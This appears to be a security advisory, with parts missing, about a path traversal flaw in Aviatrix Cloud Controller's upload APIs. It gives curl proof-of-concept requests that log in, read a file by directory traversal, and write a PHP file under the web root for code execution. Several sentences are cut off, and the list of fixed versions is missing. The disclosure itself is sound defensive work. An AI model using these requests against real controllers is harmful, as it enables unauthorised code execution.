Aviatrix Cloud Controller includes multiple APIs that by design upload files from authenticated users. Some of these APIs do not adequately sanitise their input, allowing an attacker to construct a pathname that is outside the intended upload directory. The directories that can be written to include those under the web root, which allows an attacker to upload and then run code of their choosing.
CIDtoken. This is sent in the response to the
login_procaction, and used in most API calls.
$ curl -k https://aviatrix/v1/backend1 -d action=login_proc -d "username=Test User" -d "password=Password"
CID, make the following request, which will read a file from
/tmp. On recent versions (after January 2021), replace the path with
curl -k https://aviatrix/v1/backend1 -d CID=ZyGaXCfPI20XD4x5MIY9 -d action=get_metric_gw_selections -d account_name=/../../../../../tmp/build_info
/var/www/php/downloads. This directory is not protected by a
curl -k https://aviatrix/v1/backend1 -d CID=ZyGaXCfPI20XD4x5MIY9 -d action=set_metric_gw_selections -d account_name=/../../downloads/test.php -d data="hello<?php phpinfo()?>"
https://aviatrix/v1/downloads/test.php, which will show the PHP Version information.
Upgrade to one of the following versions: